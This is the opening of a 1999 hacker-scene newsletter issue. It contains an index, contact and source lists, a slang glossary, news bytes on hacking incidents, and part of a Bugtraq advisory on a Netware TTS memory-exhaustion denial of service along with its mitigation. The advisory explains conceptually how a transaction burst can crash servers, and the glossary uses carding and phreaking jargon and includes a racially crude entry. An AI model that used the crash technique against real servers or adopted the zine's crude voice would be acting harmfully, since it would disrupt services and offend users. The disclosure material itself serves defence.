HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth.

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
[=HWA'99=]   Number 19   Volume 1   1999   May 22nd 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75:             ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

"If hackers ran the world, there'd be no war--lots of accidents, maybe."
- Anon.

Synopsis
---------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (remember i'm doing this for
me, not you, the fact some people happen to get a kick/use out of it is of
secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as AntiOnline,
the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor
could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many sources
as possible and providing links to further info, its a labour of love and
will be continued for as long as I feel like it, i'm not motivated by dollars
or the illusion of fame, did you ever notice how the most famous/infamous
hackers are the ones that get caught? there's a lot to be said for remaining
just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #19
=-----------------------------------------------------------------------=

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
*** Note that the channel isn't there to entertain you its for  ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************

=-------------------------------------------------------------------------=
Issue #19
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key      Content
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. NMRC Advisory, DoS with Netware 4.x's TTS........................
04.0 .. CA's InoculateIT for Windows NT v4.53 only scans inboxes.........
04.1 .. CA's Inoculan software vulnerabilities on NT Workstation SP3 or SP4
05.0 .. [ISN] Everywhere your MAC address shows up.......................
06.0 .. [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs..............
07.0 .. INNdstart 2.0 vulnerability, possible root compromise............
08.0 .. Sunsolve Database leaks crucial information......................
09.0 .. [ISN] Asia is wide open to virus, hacker attacks.................
10.0 .. More on Zyklon's legal troubles..................................
11.0 .. IRC war and a Police HQ bomb threat send two headed for trouble..
12.0 .. UK Labels Windows as 'secure'....................................
13.0 .. Yugoslavia to stay plugged in....................................
14.0 .. VISA Releases Draft Protection Profile ..........................
15.0 .. cgichk v1.35 by su1d sh3ll now scans for 65 vulnerabilities......
15.1 .. cgichk.pl PERL version of the above cgi scanner from Wiltered Fire
16.0 .. Vulnerability in Netscape bookmarks found by George Guninski.....
17.0 .. Lotus Notes in bed with the NSA on encryption keys...............
18.0 .. Packetstorm Security Gets the choke order for .yu sites..........
19.0 .. Common Trojans and the ports they can be found on................
20.0 .. Fts_read vulnerability provides root compromise in FreeBSD find, du
21.0 .. Excel Macro Virus protection patch has a hole....................
22.0 .. Possible root compromise when installing new SSHD................
23.0 .. Apple's AtEase 5.0 security hole.................................
24.0 .. Bug in Microsoft Outlook Express.................................
25.0 .. Trivial buffer overflow DoS on WinAMP 2.x........................
26.0 .. DISA Limits network activity.....................................
27.0 .. Money in the bank is an intangible?..............................
28.0 .. r00tfest is May 21st to 23rd, and promises to be a big success...
29.0 .. heh.pl creates a number of rootshells in /tmp and disguises itself
30.0 .. RedHat6.0 fixes available for some current vulnerabilities........
31.0 .. BisonWare FTP server vulnerabilities can lead to root compromise..
32.0 .. Key Escrow revisited (who are the real criminals here??)..........
33.0 .. AOL Under Siege by Hackers, NOT! .................................
34.0 .. Unknown spammer gets sued.........................................
35.0 .. German police crack down on internet crime........................
36.0 .. After a rather long hiatus BoW resurfaces and releases issue #9...
37.0 .. AntiOnline opens up its knowledge database to the pheds...........
38.0 .. [ISN] RAID99 Hosted by CERIAS Call for papers.....................
39.0 .. Cryptogram May 15th'99............................................
40.0 .. [ISN] Why i'm a security pessimist................................
41.0 .. Bombs Off The Net!................................................
42.0 .. Dark Spyre may end up in jail.....................................
43.0 .. ACTINIC ecommerce package claims to be 'unhackable'...............
44.0 .. MP3's off the net?................................................
45.0 .. Free DNS! finally a network picks up the pieces from ml.org ......
46.0 .. pIRCHCrack cracks password in pirch.ini files.....................
47.0 .. NASA vulnerable to attack.........................................
48.0 .. Vermont's Security Compromised ...................................
49.0 .. NIST May Be Named Info Security Clearing House ...................
50.0 .. 097M.Tristate Macro Virus Contained ..............................
51.0 .. "Hackers" Ruin Online Poll .......................................
52.0 .. DSC v1.01 Released new ezine hits the electronic stands...........
53.0 .. Laser Pointers Illegal? ..........................................
54.0 .. Exploiting NT buffer overruns.....................................
55.0 .. More on biometrics from ZDNET.....................................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
        thats tres cool, if not we'll consider ur ad anyways so send it in.
        ads for other zines are ok too btw just mention us in yours, please
        remember to include links and an email contact. Corporate ads will
        be considered also and if your company wishes to donate to or
        participate in the upcoming Canc0n99 event send in your suggestions
        and ads now...n.b date and time may be pushed back join mailing list
        for up to date information.......................................
        Current dates: Aug19th-22nd Niagara Falls... ....................
HA.HA .. Humour and puzzles ............................................
         Hey You!........................................................
         =------=........................................................
         Send in humour for this section! I need a laugh and its hard to
         find good stuff... ;)...........................................
SITE.1 .. Featured site, ................................................
H.W .. Hacked Websites ................................................
A.0 .. APPENDICES.......................................................
A.1 .. PHACVW linx and references.......................................
=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT?
V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR
HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR
EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE
IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY
current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C)
AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES
ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News is
news so i'll print any and all news but will quote sources when the source is
known, if its good enough for CNN its good enough for me. And i'm doing it for
free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If you
have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed matter
like newspaper clippings a subscription to your cool foreign hacking zine or
photos, small non-explosive packages or sensitive information etc etc well,
now you can. (w00t) please no more inflatable sheep or plastic dog droppings,
or fake vomit thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places it is cost
prohibitive but if you have the time and money be a cool dude / gal and send a
poor guy a postcard preferably one that has some scenery from your place of
residence for my collection, I collect stamps too so you kill two birds with
one stone by being cool and mailing in a postcard, return address not
necessary, just a "hey guys being cool in Bahrain, take it easy" will do ...
;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with
  hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun or
  social engineering examples or transcripts thereof.

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete nor
listed in any degree of importance) Unless otherwise noted, like msgs from
lists or news from other sites, articles and information is compiled and or
sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls .......................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0

http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.

http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ ............ Electronic Underground Affiliation
http://ech0.cjb.net ................... ech0 Security
http://axon.jccc.net/hir/ ............. Hackers Information Report
http://net-security.org ............... Net Security
http://www.403-security.org ........... Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that you
don't care whether the article/email is to be used in an issue or not and may
be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates page
at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it to
the drop box.

- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info file)
started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq. I've been
archiving this list on the web since late 1993. It is searchable with glimpse
and archived on-the-fly with hypermail.

Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential
"noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address if
the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are responsible
for the words that you post on this list and that reproduction of those words
without your permission in any medium outside the distribution of this list
may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security. To
subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank
message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit
http://www.counterpane.com/unsubform.html. Back issues are available on
http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane
Systems, the author of "Applied Cryptography," and an inventor of the
Blowfish, Twofish, and Yarrow algorithms. He served on the board of the
International Association for Cryptologic Research, EPIC, and VTW. He is a
frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way
i'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............:
currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already also if
you want your emails listed send me a note ... - Ed

http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count
   paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
   news events its a good idea to check out issue #1 at least and possibly
   also the Xmas issue for a good feel of what we're all about otherwise
   enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may have to
get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although it is
laughed at, shunned, or even pigeon holed with those 'dumb leet (l33t?) dewds'
this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to
all you up and comers, i'd highly recommend you get that book. It's almost
like buying a clue. Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't be
reprinted unless changed in a big way with the exception of the following
excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed
below: Some are very useful, others attempt to deny any possible attempts at
eschewing obfuscation by obscuring their actual definitions.

@HWA     - see EoA ;-)

!=       - Mathematical notation "is not equal to" or "does not equal"
           ASC(247) "wavey equals" sign means "almost equal" to. If written
           an =/= (equals sign with a slash thru it) also means !=, =< is
           Equal to or less than and => is equal to or greater than (etc,
           this aint fucking grade school, cripes, don't believe I just
           typed all that..)

AAM      - Ask a minor (someone under age of adulthood, usually <16, <18 or
           <21)

AOL      - A great deal of people that got ripped off for net access by a
           huge clueless isp with sekurity that you can drive buses through,
           we're not talking Kung-Fu being none too good here, Buy-A-Kloo
           maybe at the least they could try leasing one??

*CC      - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC      - Chaos Computer Club (Germany)

*CON     - Conference, a place hackers crackers and hax0rs among others go to
           swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear,
           get drunk watch videos and seminars, get drunk, listen to
           speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
               hacker speak he's the guy that breaks into systems and is
               often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip,
               I like jalapeno pepper dip or chives sour cream and onion,
               yum - Ed

Ebonics  - speaking like a rastafarian or hip dude of colour also wigger
           Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
           ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC      - End of Commentary

EoA      - End of Article or more commonly @HWA

EoF      - End of file

EoD      - End of diatribe (AOL'ers: look it up)

FUD      - Coined by Unknown and made famous by HNN - "Fear uncertainty and
           doubt", usually in general media articles not high brow articles
           such as ours or other HNN affiliates ;)

du0d     - a small furry animal that scurries over keyboards causing people
           to type weird crap on irc, hence when someone says something
           stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER  - Read Stephen Levy's HACKERS for the true definition, then see
           HAX0R

*HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is
               difficult to define, I think it is best defined as pop
               culture's view on The Hacker ala movies such as well erhm
               "Hackers" and The Net etc... usually used by "real" hackers
               or crackers in a derogatory or slang humorous way, like
               'hax0r me some coffee?' or can you hax0r some bread on the
               way to the table please?'
           2 - A tool for cutting sheet metal.

HHN      - Maybe a bit confusing with HNN but we did spring to life around
           the same time too, HWA Hax0r News.... HHN is a part of HNN .. and
           HNN as a proper noun means the hackernews site proper. k? k.

HNN      - Hacker News Network and its affiliates
           http://www.hackernews.com/affiliates.html

J00      - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI  - Missing on/from IRC

NFC      - Depends on context: No Further Comment or No Fucking Comment

NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

NFW      - No fuckin'way

*0WN3D   - You are cracked and owned by an elite entity see pheer

*OFCS    - Oh for christ's sakes

PHACV    - And variations of same Phreaking, Hacking, Anarchy, Cracking,
           Carding (CC) Groups Virus, Warfare

           Alternates: H - hacking, hacktivist
                       C - Cracking
                       C - Cracking
                       V - Virus
                       W - Warfare
                       A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                       P - Phreaking, "telephone hacking" PHone fREAKs ...
                       CT - Cyber Terrorism

*PHEER   - This is what you do when an ereet or elite person is in your
           presence see 0wn3d

*RTFM    - Read the fucking manual - not always applicable since some manuals
           are pure shit but if the answer you seek is indeed in the manual
           then you should have RTFM you dumb ass.

TBC      - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA      - To Be Arranged/To Be Announced also 2ba

TFS      - Tough fucking shit.

*w00t    - 1 - Reserved for the uber ereet, no one can say this without
               severe repercussions from the underground masses. also
               "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both
               shit stirrers)

*wtf     - what the fuck

*ZEN     - The state you reach when you *think* you know everything (but
           really don't) usually shortly after reaching the ZEN like state
           something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd like to
see more reader input, help me out here, whats good, what sucks etc, not that
I guarantee i'll take any notice mind you, but send in your thoughts anyway.
* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman Astral p0lix Vexx g0at security

Shouts to tekz from HK for asking nicely in eye-are-see! ;-) and to t4ck for
making my night albeit I couldn't stick around for the rest of the comedy
routine. hacked star dot star with phf huh? .... ;-)) and the #innerpulse,
crew and some inhabitants of #leetchans .... although I use the term 'leet
loosely these days, ;)

kewl sites:

+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always
popular..." - FProphet '99

+++ When was the last time you backed up your important data?

++ FREE KEVIN Demonstrations Go WorldWide

From HNN http://www.hackernews.com/
contributed by Macki

With demonstrations now scheduled in front of the US Embassy in Russia the
FREE KEVIN movement goes World Wide. Kevin Mitnick has been held in pretrial
detention since February 15, 1995, without a constitutionally guaranteed bail
hearing for possession of software allegedly worth millions of dollars.
Protest demonstrations are now being planned around the world for Friday,
June 4 in front of federal courthouses and U.S. embassies beginning at 2 pm to
protest the unjust treatment of Kevin Mitnick. If there is a protest in your
city please attend. If there is not please organize one. The government must
be shown that the people will not sit idly by while their rights are trampled!

FREE KEVIN Demonstrations
http://www.2600.com/demo/index.html

++ OpenBSD 2.5

From HNN http://www.hackernews.com/
contributed by Weld Pond

OpenBSD, a Free UNIX variant that places emphasis on portability,
standardization, correctness, security, and cryptography, has just been
upgraded to version 2.5. OpenBSD is a multiplatform and ultrasecure operating
system. HNN uses it, shouldn't you? "OpenBSD: Sending the Kiddies to /dev/null
since 1992"

openbsd.org
http://www.openbsd.org/

Amazon.com- Reserve Your Copy Today!
http://www.amazon.com/exec/obidos/ASIN/0968363733/hackernewsnet

++ Chinese attacks on U.S computers

From http://www.net-security.org/

CHINESE HACKERS RAID U.S. COMPUTERS
by LucasAr, Monday 17th May 1999 on 4:30 pm CET

Chinese hackers have attacked U.S. government information systems, including
the White House network, in response to the errant bombing of the Chinese
Embassy in Yugoslavia, according to an FBI report.

++ Just found this on the net, on Discovery Online no less, it has a (short)
Hacker's Hall of Fame list with mini-bios of the featured hackers. - Ed

http://www.discovery.com/area/technology/hackers/stallman.html

++ MIT Pulls R2-D2 Hack

From HNN http://www.hackernews.com/
contributed by Code Kid

Arguably the place where the word Hacker was coined, MIT students have turned
the Great Dome into a giant R2-D2. For those of you who have been dead for the
last seven years R2-D2 is an android from the Star Wars movie series. The hack
consisted of covering the dome in red, white, blue, and black mesh-fabric
panels. The hackers left a dozen doughnuts and instructions on how to remove
the display. The Great Dome has been a popular place for Hacks in the past.
Some of the better known ones have transformed the Dome into a Breast, a
Pumpkin, or have placed a Police Cruiser replica on the top.

MIT Hack Gallery - Pictures Here
http://hacks.mit.edu/Hacks/Gallery.html

Wired
http://www.wired.com/news/news/culture/story/19743.html

++ Scanner profiteer busted

From HNN http://www.hackernews.com/
contributed by erewhon

Eric Ford, 27, of Studio City, CA, has pleaded guilty of recording and then
selling the contents of a cellular phone call he listened to with a modified
police scanner. The conversation was a "marital squabble" that took place
between Tom Cruise and Nicole Kidman. After parts of the conversation appeared
in tabloids the couple contacted the FBI to start an investigation. The
perpetrator was sentenced by a federal judge to six months in jail, 150 hours
of community service and fined $3,000.

APB Online
http://www.apbonline.com/911/1999/05/17/cruise0517_01.html

++ Internet Set Free in Canada

From HNN http://www.hackernews.com/
contributed by blsonne

The Canadian Radio-television and Telecommunications Commission (CRTC) agreed
on Monday that it will not regulate new media services on the Internet. After
concluding that new media services are vibrant, highly competitive and
successful without regulation, the CRTC has decided not to impose new rules on
the internet so as to not hinder Canada in the global marketplace.

CRTC
http://www.crtc.gc.ca/ENG/NEWS/RELEASES/1999/R990517e.htm

++ Fujitsu Victim of Password Stealing Virus

From HNN http://www.hackernews.com/
contributed by 0yK0t

InfoWeb, Fujitsu Ltd.'s Internet service, has become the victim of an email
virus designed to steal users' passwords. The email claims that users are at
risk from a new virus and should run the enclosed attachment as a precaution.
The attachment then steals users' passwords and emails them to a separate
address. G-Search Ltd., a Fujitsu affiliate, says that at least 68 people
received the virus/attachment. And once again this virus only affects Windows
users.
AsiaBizTech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/70448

Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

No mail for sharing this week!

================================================================

@HWA

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");
    /*
     * Issue #19 'w00t'
     *
     *
     *
     */
    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main address:
hwa@press.usmc.net
complaints and all nastygrams and mailbombs can go to /dev/nul
nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org
danke.

C*:.

@HWA

03.0 Novell Netware buffer overflow in TTS (Transaction Tracking System)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 12 May 1999 14:18:59 -0500
From: Simple Nomad
To: BUGTRAQ@netspace.org
Subject: DoS with Netware 4.x's TTS

_______________________________________________________________________________

                        Nomad Mobile Research Centre
                              A D V I S O R Y
                                www.nmrc.org

Simple Nomad [thegnome@nmrc.org]
12May1998
_______________________________________________________________________________

Platform    : Netware 4.x
Application : NDS
Severity    : High

Synopsis
--------

It is possible to overflow the Transaction Tracking System (TTS) built into Novell Netware and possibly crash multiple servers.

Tested configuration
--------------------

The testing was done with the following configuration:

Netware 4.11, Service Pack 5B

Also confirmed on Netware 4.1. All systems had 64MB RAM and 1 GB drive space.

Bug(s) report
-------------

The Transaction Tracking System (TTS) is used by Novell Netware to help preserve the integrity of data during a system crash.
If a transaction is in the process of being written to the hard drive when the system crashes, upon reboot the partial transaction is backed out, preserving the integrity of the original data. Administrators can optionally flag a file with the TTS flag to add this protection (typically done with databases, especially those that have no rollback features).

TTS by default tracks 10,000 transactions, and each instance uses a small amount of memory. If a burst of transactions is sent to the server and the available memory is exhausted, TTS will disable. While TTS is disabled, no updates can be made to Netware Directory Services. This can impact any program or process that updates NDS, such as login.

In extreme overrun cases, such as very large simultaneous (or near simultaneous, actually) transactions, memory will be depleted quickly enough to crash the server. This is not entirely uncommon, as any large burst of traffic updating NDS will cause the problem, such as bringing up a server after several days of downtime that has a Directory Services replica on it. Normally this can be corrected by increasing RAM or lowering the amount of transactions tracked from the maximum default of 10,000 down to say 5,000 by issuing the command

    SET MAXIMUM TRANSACTIONS = 5000

at the console or via ServMan, and enabling TTS by typing

    ENABLE TTS

at the console.

